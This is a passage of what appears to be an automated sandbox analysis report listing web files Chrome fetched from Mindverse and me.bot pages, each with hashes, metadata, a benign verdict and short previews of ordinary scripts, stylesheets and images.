                                      Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 404 (Not Found)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (2923)
                                      Category:downloaded
                                      Size (bytes):232312
                                      Entropy (8bit):5.54681700571395
                                      Encrypted:false
                                      SSDEEP:6144:2fzu0xn5Gq2n4VOLYdDsU/8nUGIKLXuCKQ/pQUG:20qW7LYdDZ4nJLXuCK0JG
                                      MD5:BD0B5A087A748990010074FA6CC4A596
                                      SHA1:264749A1F4B32A5980EEE9D88727075D101C5338
                                      SHA-256:A8509429C049444AD0182C4354F81071372E8EAF0DE41A33BC9788E67771DAEE
                                      SHA-512:6521FC11B11A3E434C5D7ED47FE76845E0B07C3C9873999D41F99F27D7905DFC978BDB9C70B9250975820E7FFE2ABBAB1B276F6134169DEE98209127497A5181
                                      Malicious:false
                                      Reputation:low
                                      URL:https://accounts.google.com/gsi/client
                                      Preview:"use strict";this.default_gsi=this.default_gsi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x2e644000, 0xe6c, ]);.var aa,ba,ca,da,t,ea,ha,na,oa;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};da=ca(this);t=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writab
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (8540), with no line terminators
                                      Category:downloaded
                                      Size (bytes):8540
                                      Entropy (8bit):5.5397128480550535
                                      Encrypted:false
                                      SSDEEP:192:kPQERD/Uzm2moOWX5JfzeR51geP8JrCs+vapkQCWd:kPP2m2acvzWcexs+vapnn
                                      MD5:DE6481D39C96BEC3D9081EB3B0216049
                                      SHA1:5C031620AE4D91B3D08B2779C20EC8769402D096
                                      SHA-256:2AB14EE3CA975A77B0C8360ED6408065660B97CEDC8C4D39DE8733823A15B32F
                                      SHA-512:21D177D693AB24A8ED1DF59233ACC671422E0BC4D5F7AE0B8F3BDA0358BF37611F8E1B39D4FD9BC4C0C6A7E2DDB4C9E03A74C99BFCEFDF84BE34FBF5505D8AB0
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/webpack-01f8cf0da3922576.js
                                      Preview:!function(){"use strict";var e,t,n,c,r,a,f,o,i,u,d,s,b={},l={};function h(e){var t=l[e];if(void 0!==t)return t.exports;var n=l[e]={id:e,loaded:!1,exports:{}},c=!0;try{b[e].call(n.exports,n,n.exports,h),c=!1}finally{c&&delete l[e]}return n.loaded=!0,n.exports}h.m=b,h.amdO={},e=[],h.O=function(t,n,c,r){if(n){r=r||0;for(var a=e.length;a>0&&e[a-1][2]>r;a--)e[a]=e[a-1];e[a]=[n,c,r];return}for(var f=1/0,a=0;a<e.length;a++){for(var n=e[a][0],c=e[a][1],r=e[a][2],o=!0,i=0;i<n.length;i++)f>=r&&Object.keys(h.O).every(function(e){return h.O[e](n[i])})?n.splice(i--,1):(o=!1,r<f&&(f=r));if(o){e.splice(a--,1);var u=c();void 0!==u&&(t=u)}}return t},h.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return h.d(t,{a:t}),t},n=Object.getPrototypeOf?function(e){return Object.getPrototypeOf(e)}:function(e){return e.__proto__},h.t=function(e,c){if(1&c&&(e=this(e)),8&c||"object"==typeof e&&e&&(4&c&&e.__esModule||16&c&&"function"==typeof e.then))return e;var r=Object.create
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (9823), with no line terminators
                                      Category:downloaded
                                      Size (bytes):9823
                                      Entropy (8bit):5.149600969989511
                                      Encrypted:false
                                      SSDEEP:96:llhG0fk3t36ogbn/uqJQwE/vtff+fzf5fVffcfnfD3ZhNMhvTXtPGGeBHrJb2SPV:XEKow/uq8nEKVrJbb
                                      MD5:EA08FAB46D85BC2473A0A54B17502D16
                                      SHA1:46D00D6190C4DD607F3622FA37510AAC66B69780
                                      SHA-256:082A6C78F968ADA1E50F32DAA5030936BE4DE9D7782B497676A29693A3F031A8
                                      SHA-512:BA3E0C51EC450E87CA8553148E5EE905C0BFA9698794CEA071172AEF14527F4BA8CEAB6BFEA65E62B6AA60369951E64448DCD0DA3150609DEAB55E663361E6BA
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/3f09f139b66e7b7d.css
                                      Preview:.index_overlayClassName__admcN{z-index:899}.index_overlayClassName__admcN .ant-tooltip-arrow:after,.index_overlayClassName__admcN .ant-tooltip-arrow:before{background-color:#160a0a}.index_overlayClassName__admcN .ant-tooltip-content .ant-tooltip-inner{color:var(--primary-white);font-weight:400;font-size:14px;line-height:24px;background-color:#160a0a;box-shadow:none}.index_divider__nerKD,.index_divider__nerKD>div{display:flex;justify-content:center}.index_divider__nerKD>div{flex-direction:row;align-items:center;width:75%;margin-bottom:20px}.index_divider__nerKD>div>.index_line__qS_Uw{flex:1;height:1px;background-color:var(--cc-divider-line-color)}.index_divider__nerKD>div>.index_content__Ru1cc{height:18px;margin-right:16px;margin-left:16px;color:var(--cc-divider-color);font-size:12px;line-height:18px}.index_systemMsg__iXoZj{display:flex;width:-moz-fit-content;width:fit-content;max-width:var(--cc-max-width-content);margin-bottom:20px;padding:12px 16px;color:var(--cc-bg-error-system-conte
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (5555), with no line terminators
                                      Category:downloaded
                                      Size (bytes):5555
                                      Entropy (8bit):5.234285702174492
                                      Encrypted:false
                                      SSDEEP:96:zVTBCtkaj2LwMSWw51Nw3sL1gO4gmritlPd:xTQXjowuue41gORmritll
                                      MD5:01383D7E52CDFF3032A545A832FCF5DB
                                      SHA1:4BABB8BBCE4DF1039B887992E070FB97653D8DD5
                                      SHA-256:98F0F92E65B06A5AC4460C0FBFB0FEB84A2CA513C1A9C236435AA7F2BB5E59A8
                                      SHA-512:EE82315424A07857E05A0E6805316908DA6C5D21E8814BAC021ABEC23521E0B037F11265AAC78F2B0E557FC96E044B894231EEA223BD0188F3010A2CED9786EC
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/cb487624066cefb1.css
                                      Preview:.index_upload__gLmzf{display:flex;align-items:center;box-sizing:border-box;width:540px;height:68px;padding:12px;background:#fefdff;border:1px solid #eee9e4;border-radius:8px;cursor:pointer}.index_upload__gLmzf .index_error__OWYLt{display:flex;flex-direction:row;gap:8px;align-items:center;margin-right:22px;color:#ff7875;font-weight:400;font-family:Helvetica Neue,sans-serif;line-height:24px}.index_upload__gLmzf .index_success__bi4Q8{display:flex;flex-direction:row;align-items:center;margin-right:22px;color:#52c41a;font-size:18px}.index_upload__gLmzf .index_uploadText__7YCsu{flex:1;color:#160a0a;font-weight:500;font-size:14px;font-family:Helvetica Neue,sans-serif;line-height:24px}.index_upload__gLmzf .index_uploadBtn__6OzTd{position:relative;width:48px;height:48px}.index_upload__gLmzf .index_uploadBtn__6OzTd .index_cover__G5WxT{position:absolute;z-index:2;width:100%;height:100%;border-radius:8px;opacity:0;transition:opacity .3s}.index_upload__gLmzf .index_uploadBtn__6OzTd .index_loadingCo
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):18
                                      Entropy (8bit):3.5724312513221195
                                      Encrypted:false
                                      SSDEEP:3:uZuUeB:u5eB
                                      MD5:53AF239EE5D3E261545DEDEDCB6FFD57
                                      SHA1:04CA7E137E1E9FEEAD96A7DF45BB67D5AB3DE190
                                      SHA-256:99EB12F2AB3C4866A353E098FFA3CB7A967E617C49B98480394EC5D8EA92B094
                                      SHA-512:C734E4A5FF5D335A91518DBF47861BDAF8012AF49371DCD2E3350E269C9A5A1CC094114D17C4F5B053F3757B4B07487EBD0D309C91EF97ACF4665CC5D5C9A2D3
                                      Malicious:false
                                      Reputation:low
                                      Preview:404 page not found
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (6081), with no line terminators
                                      Category:downloaded
                                      Size (bytes):6081
                                      Entropy (8bit):5.132943754918023
                                      Encrypted:false
                                      SSDEEP:96:e+ll/Ii57Zjce8vq41M9OO4eYB0hxCfAr0MMMRXjxi9+:e+ll/Ii5ljcJ9qOOWYE/I3
                                      MD5:3561E6662D08B98A1F9971371C14215F
                                      SHA1:5FB2D9A5A0E6B34356A7E6B2A454D0C3732460C5
                                      SHA-256:9E1DFC38289F2D6580C78E994A0926DD95CFA584173937F325CBC8C730A74B89
                                      SHA-512:A9D2DAFFB9F634A9B9CA73686B5A44BE260B4CC7E53077F3933DFA8926094E6656376910BB21290324846B336CC2B9278E217AA1D5E1E26D6E81825494078DDD
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/946f496f633c5652.css
                                      Preview:.index_titleItem__9M_rm{margin-top:24px}.index_delete__ZzuoG{margin-top:12px}.index_modalContainer__aYiHi{font-size:14px;line-height:24px;color:var(--primary-black)}.index_modalContainer__aYiHi .index_ulContent__Ckwxy{margin:0;padding-inline-start:20px}.index_container__wsTfT .index_bodyContainer__USTIe .index_titleItem__M_PX_{margin-top:24px}.index_container__wsTfT .index_bodyContainer__USTIe .index_titleItem__M_PX_:first-child{margin-top:0}.index_container__wsTfT .index_bodyContainer__USTIe .index_uploadAvatar__CGbAe{position:relative;width:60px;height:60px;margin-top:12px}.index_container__wsTfT .index_bodyContainer__USTIe .index_uploadAvatar__CGbAe input{position:absolute;display:none}.index_container__wsTfT .index_bodyContainer__USTIe .index_uploadAvatar__CGbAe .index_avatarImg__Azv4a{width:60px;height:60px;border-radius:50%;cursor:pointer}.index_container__wsTfT .index_bodyContainer__USTIe .index_uploadAvatar__CGbAe .index_maskView__TfxMg{position:absolute;top:0;left:0;display:fl
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:GIF image data, version 89a, 1500 x 1500
                                      Category:dropped
                                      Size (bytes):16668214
                                      Entropy (8bit):7.921533212250572
                                      Encrypted:false
                                      SSDEEP:393216:V1KiM6AFN9/k9/1duD4DUDwNLrffDf/f/fE:vKiM6ONSMA0wNLrn7HHE
                                      MD5:C78C42AA55544D438ACE3062BB3F5237
                                      SHA1:C3BC4B74806F5D0689AEDCE929988302856E1511
                                      SHA-256:DD88E00FE04E2A572998E74B1FE084A319D391F2852D13183B70147FBD78D977
                                      SHA-512:E3FD103005F4487ADF67446041652142B08D22AF3DF4CB70F29598C7C21AA008338F980E2D97C52949EC1C34D315E10EB63E8FE1E70A2B7F4DBFC141DDF8529F
                                      Malicious:false
                                      Reputation:low
                                      Preview:GIF89a...........eoN....k.hUm]L...XR/:D,.....R..NXL..l..e..U.N...R3GC..w.n2..]0.Y.}W.y^...T2..>.z&.T..^3..O....3.v.vM}F$...........e....p..w...................f....jF............jM....`E..x....y..^.........+1*...eB..ke.?.x..{9..._pji.T.z^kso|.@.c...|..Oyj^...vH.Q....~Un9.._.i...x.N........h...x..d..J.x.g.......V..Q..a..!.....j.........g.hy}[.i..{@...........!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.3 (Macintosh)" xmpMM:InstanceID="xmp.iid:ADA50707CA7611EF94A5E80A6F57A235" xmpMM:DocumentID="xmp.did:ADA50708CA7611EF94A5E80A6F57A235"> <xmpM
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (975), with no line terminators
                                      Category:downloaded
                                      Size (bytes):975
                                      Entropy (8bit):5.063985200294097
                                      Encrypted:false
                                      SSDEEP:12:APOER0NfbQJ7KUVlmfPsju9ZaDVk2GezCMYAZf0kSxGZf0kkLp+Zf0kTZpxFZfEt:AG4RFSf0jwMDV+OsGC9+1RF7Q09m
                                      MD5:8EA01729E6E84B032F7547554D17B9ED
                                      SHA1:D62FB42083F65EED59CD73A39A38AC119841BC0E
                                      SHA-256:9F7A49A2188F74D73524E7A473EB303AACF2EDEB1537E7C69BE9B62E1976CB79
                                      SHA-512:DEF8E3E488F0A4962C98A1F78B3635D39E9CB49D8B5561BE81E8E6E9B03E5133CDE3F4D849D80E99F80F2DA48365453CB2A38EC1F8612DCC690EE4A91A8591E2
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/ed021f0a9422f6a5.css
                                      Preview:.index_modal__rL57A{position:static;width:100vw!important;max-width:none;height:100vh!important;margin:0;padding:0!important}.index_modal__rL57A .ant-modal-content{height:100%;background:linear-gradient(180deg,#f0e7db,#eee2de 37%,#ebe6f4 69%,#e2f0ef 88%)!important;border-radius:0}.index_modal__rL57A .ant-modal-body{display:flex;align-items:center;justify-content:center;width:100%;height:100%;overflow-y:auto}.index_modal__rL57A .ant-modal-body::-webkit-scrollbar{width:2px;background-color:transparent;border-radius:2px}.index_modal__rL57A .ant-modal-body::-webkit-scrollbar-thumb,.index_modal__rL57A .ant-modal-body::-webkit-scrollbar-track{background-color:transparent;border-radius:1px}.index_modal__rL57A .ant-modal-body:hover::-webkit-scrollbar{background-color:#f4f4f4}.index_modal__rL57A .ant-modal-body:hover::-webkit-scrollbar-thumb{background-color:var(--primary-color)}.index_modal__rL57A .ant-modal-body:hover::-webkit-scrollbar-track{background-color:#f4f4f4}
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (48316), with no line terminators
                                      Category:downloaded
                                      Size (bytes):48316
                                      Entropy (8bit):5.6346993394709
                                      Encrypted:false
                                      SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                      MD5:2CA03AD87885AB983541092B87ADB299
                                      SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                      SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                      SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                      Malicious:false
                                      Reputation:low
                                      URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (10982), with no line terminators
                                      Category:downloaded
                                      Size (bytes):10982
                                      Entropy (8bit):5.654152062830941
                                      Encrypted:false
                                      SSDEEP:192:gb9t6Ux/tMMF2VMbFneBY4VpY7J9ox4cwGv2xD/0qZdsFVp6c6:gb9t6Ux/tMMai85VpY7J9ox4cwGqjRES
                                      MD5:6FB5EF28D5D4A45E6FC2423BD901F4D7
                                      SHA1:CC19642106BA77D6F8B67AF9548837683C25C17C
                                      SHA-256:37BFE094DC8C1818D21DFC470A0FACADAC46ACA84FCCE16F57076D0415935370
                                      SHA-512:E863C220CCD3B0CD484076152257F4333A73E6719445172DBAEBE226488936F36F71CFCDEC59916107AFCCFF88A2A3871179E719B6CA6AC63E016F7951BA45A1
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/app/(layout)/(PALayout)/home/page-7286f55068b8b827.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6313],{60994:function(e,_,m){Promise.resolve().then(m.bind(m,54404))},16463:function(e,_,m){"use strict";var n=m(71169);m.o(n,"usePathname")&&m.d(_,{usePathname:function(){return n.usePathname}}),m.o(n,"useRouter")&&m.d(_,{useRouter:function(){return n.useRouter}}),m.o(n,"useSearchParams")&&m.d(_,{useSearchParams:function(){return n.useSearchParams}}),m.o(n,"useSelectedLayoutSegment")&&m.d(_,{useSelectedLayoutSegment:function(){return n.useSelectedLayoutSegment}}),m.o(n,"useSelectedLayoutSegments")&&m.d(_,{useSelectedLayoutSegments:function(){return n.useSelectedLayoutSegments}}),m.o(n,"useServerInsertedHTML")&&m.d(_,{useServerInsertedHTML:function(){return n.useServerInsertedHTML}})},54404:function(e,_,m){"use strict";m.r(_);var n=m(16463),t=m(2265),o=m(64671),E=m(47835),r=m(87170),i=m(10433);_.default=function(){let e=(0,t.useRef)(null),[_]=(0,E.Z)("layoutSize"),m=(0,n.useRouter)();return(0,t.useEffect)(()=>{_&&_===o.N.SMALL&&m
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:JSON data
                                      Category:downloaded
                                      Size (bytes):267
                                      Entropy (8bit):5.101320166710303
                                      Encrypted:false
                                      SSDEEP:6:QGKqW+fPWbY6A/CcU/e2eZzTHwA9JYzz1Mbtmfvn:ddfPWbB8TUuTQAruH
                                      MD5:3779A109BFA84F9B7389B8FD345A4DE7
                                      SHA1:1982941194B69F771DE625687D6C5310062B1E7E
                                      SHA-256:84D93A90A0E78A4B24230E11B6BEDF627FE011406C5211694BCB71824359A99E
                                      SHA-512:483FAE7EDB3186E3ABF803547F7DDBAAE67254EBC1CA732CBC90E3C16B06C0B0E86C86EB988C67FBC92E1C28CB3CF0D1CF12EB48E0E44898219120312E7D135C
                                      Malicious:false
                                      Reputation:low
                                      URL:https://firebase.googleapis.com/v1alpha/projects/-/apps/1:730397711754:web:00c91681bfcf00e098fc73/webConfig
                                      Preview:{. "projectId": "mindos-d3299",. "appId": "1:730397711754:web:00c91681bfcf00e098fc73",. "storageBucket": "mindos-d3299.firebasestorage.app",. "authDomain": "mindos-d3299.firebaseapp.com",. "messagingSenderId": "730397711754",. "measurementId": "G-MDCC7BHCT1".}.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:SVG Scalable Vector Graphics image
                                      Category:downloaded
                                      Size (bytes):1368
                                      Entropy (8bit):4.70705937388994
                                      Encrypted:false
                                      SSDEEP:24:t415iiBuP4tc71a/AfsEadFRai+WbQM0L+bG65e7/hH/h2F5DbDpoEO26o:CRBubpassHdrai+EX0L+k7/BYFtb9oXo
                                      MD5:D09CC53D7D35A62A2E85BC223D50BB1E
                                      SHA1:9C6F65F0991E6406A3BC4ABB6784679214909FF0
                                      SHA-256:4D88657FF48D595EEC199746B2C9CA59F0EE7D679478B90B1F41EE4438282F59
                                      SHA-512:5B492713D59A765A7D3288E500364FCDB6DD6EE3A8714D8C0EC76F91F43290E8E6CC007260733E2982BF521934DD1377E7C0FAE6F0879EE94E9469B5F193DA95
                                      Malicious:false
                                      Reputation:low
                                      URL:https://app.me.bot/default_logo.svg
                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 841.89 477.45"><defs><style>.cls-1 {fill: #ffb939; }.cls-2 {fill: #b6a0ff;}.cls-3 {fill:#180b00;}</style></defs><path class="cls-1" d="M346.63,437.6c85.07,34.2,190.98-61.84,315.22,22.73,77.2,52.56,179.69-14.19,180.04-224.3,.21-125.12-86.87-230.42-216.5-235.35-147.52-5.61-199.26,100.18-243.56,209.88-20.71,51.28-93.09,203.77-35.2,227.04Z"/><circle class="cls-3" cx="628.33" cy="205.03" r="16.25"/><circle class="cls-3" cx="493.72" cy="171.28" r="16.25"/><path class="cls-3" d="M558.24,237.21c-13.07,0-28.81-4.66-41.32-22.41-1.14-1.62-.75-3.85,.86-4.99,1.61-1.14,3.85-.75,4.99,.86,22.56,32.01,56.35,15.22,57.78,14.49,1.75-.9,3.92-.21,4.82,1.55,.9,1.76,.22,3.91-1.54,4.82-.21,.11-11.31,5.68-25.6,5.68Z"/><g><path class="cls-2" d="M384.02,438.67c-60.88,16.58-67.98-63.27-218.07,27.14C114.09,497.05,10.75,431.37,.52,258.33-7.44,123.85,77.31,13.47,200.26,1.15h0c122.95-12.33,225.06,76.14,248.86,205.61,21.95,119.46-19.67,219.54-65.1,231.91Z"/><circle c
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (65531)
                                      Category:downloaded
                                      Size (bytes):129782
                                      Entropy (8bit):5.438712208298761
                                      Encrypted:false
                                      SSDEEP:3072:M+kkijDGgp9arnN+yEf1geZN9D6z6x0zW:jajVParnN+yEf1geZN9D46AW
                                      MD5:F9DB04D8C2CC582B6F414039ED792922
                                      SHA1:2F9AA81958E87AEEBF4381791CC3AB29D6DA272C
                                      SHA-256:12D797C625E36C251361D4F41664D7D05D7F88E0378C92B1AE2A23D425BA08CA
                                      SHA-512:5445475C8ADF8F2C0832F4CD9EF53D7CFC633B583A35306C5C3AE75A9158EF407DC3531AB05A351CA7A69F218D63B986E8F40090BDEF1533AB96F1C627272A45
                                      Malicious:false
                                      Reputation:low
                                      URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                      Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Fa gb_2d gb_Pe gb_rd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Qd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_ld gb_pd gb_Hd gb_md\"\u003e\u003cdiv class\u003d\"gb_xd gb_sd\"\u003e\u003cdiv class\u003d\"gb_Kc gb_R\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Kc gb_Nc gb_R\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:Unicode text, UTF-8 text, with very long lines (38071)
                                      Category:downloaded
                                      Size (bytes):38079
                                      Entropy (8bit):5.6552692690047275
                                      Encrypted:false
                                      SSDEEP:384:pkhixc134HRtgQ6EDvXFrdWpCT1un8Lh75+pCqNFaiE8E0QIQfJXlu1RWfoVv8aw:y11IHR+apHxc9NwlJXQTDVvhtPh168ji
                                      MD5:3E7DFAC8DED36D55395B49AA463564C0
                                      SHA1:02E4E055953CFC35396AE0C6115D4D379191028E
                                      SHA-256:637E11CE6A047A04E4AAFADBD5EFE64FA76BF2C6B504EAA4F25CD3AE5B6972EA
                                      SHA-512:77148E811C77F844F07E976D91167D26D3B8BD164DB6D8DFB18F9DA108FBF8317367310B047BB58566FA2EE1A359C6705EBD956EFFE8E398CEC2806C943974A4
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/tracker/tracker.js
                                      Preview:!function(){"use strict";var e,n,t,r="MINDVERSE_TRACKER_CONFIG",o="fingerPrint";!function(e){e.BIZ_ID="bizId",e.BASE_URL="baseUrl",e.USER_ID_KEY="userIdKey",e.ENV="env"}(n||(n={})),function(e){e.TEST="test",e.PRE="pre",e.PROD="prod"}(t||(t={}));var i,a,c,u,l=((e={})[n.BIZ_ID]="",e[n.BASE_URL]="",e[n.USER_ID_KEY]="",e[n.ENV]="",e);!function(e){e.TEST="https://mindos-devusk8s.mindverse.ai/gate/log/rest/os/action/up",e.PRE="https://mindos-prek8s.mindverse.ai/gate/log/rest/os/action/up",e.PROD="https://app.mindos.com/gate/log/rest/os/action/up"}(i||(i={})),function(e){e.DATA="DATA",e.ERROR="ERROR",e.PERFORMANCE="PERFORMANCE"}(a||(a={})),function(e){e.EXPOSE="EXPOSE",e.CLICK="CLICK",e.OTHER="OTHER"}(c||(c={})),function(e){e.ON_ERROR="ON_ERROR",e.RESOURCE="RESOURCE",e.UNHANDLED_REJECTION="UNHANDLED_REJECTION",e.SERVICE="SERVICE",e.CUSTOM="CUSTOM"}(u||(u={}));var s=function(){return s=Object.assign||function(e){for(var n,t=1,r=arguments.length;t<r;t++)for(var o in n=arguments[t])Object.protot
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:downloaded
                                      Size (bytes):91
                                      Entropy (8bit):4.947846871207472
                                      Encrypted:false
                                      SSDEEP:3:Ub/HXiREpEyqXXl6EA2FPXn:UrXiglqX1VX
                                      MD5:A13DB20E093F3BC38FD835720D908A8F
                                      SHA1:C557613765CCB7FAF5A8F85C165F3F854A181258
                                      SHA-256:F326BCC5C980D505D3D2AA70EE09CEAF6407E5EB376B14C3ECE7C583E2B37B2F
                                      SHA-512:98722BC1B4DDA73D0441652C504CC034902A3F0F72BC155F23982A0D4A7A4FD2955EBAA554E7ECD244A87E79D77C7BA4904FF9B49AAB2F1D7F5B0BD8ADFB4693
                                      Malicious:false
                                      Reputation:low
                                      URL:https://app.link/_r?sdk=web2.85.0&_t=1430591912343977668&branch_key=key_live_mEmJ6vCmCTCf3F0HkItErkhdsAmg6bf2&callback=branch_callback__0
                                      Preview:/**/ typeof branch_callback__0 === 'function' && branch_callback__0("1430591912343977668");
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (11083)
                                      Category:downloaded
                                      Size (bytes):16347
                                      Entropy (8bit):5.316832950004443
                                      Encrypted:false
                                      SSDEEP:96:ULvycz20I5gx2h6z5NgeujzTFmNcmhAmC00c352/5SABDSTWDVFcNs0xTlEurvdK:Uz/INU7UvXE1UgG
                                      MD5:DA88D72A82EF86B643AD40B78C2F9CB1
                                      SHA1:67B21100EA60A94108B7B1242C13E21A0136647A
                                      SHA-256:44DCDF92366D118091F20B24906110609BB7A0726726D147435AEC3266B71B1A
                                      SHA-512:1BBEFB294F72007ED716CAE05CB1107161CB5D65FE281C3C37595184F003D491B353E8EE603782588B4502D6CEA9376FCE720043446D9F92026D39C92A074285
                                      Malicious:false
                                      Reputation:low
                                      URL:https://app.me.bot/memory-mobile/detail?_rsc=1m3fu
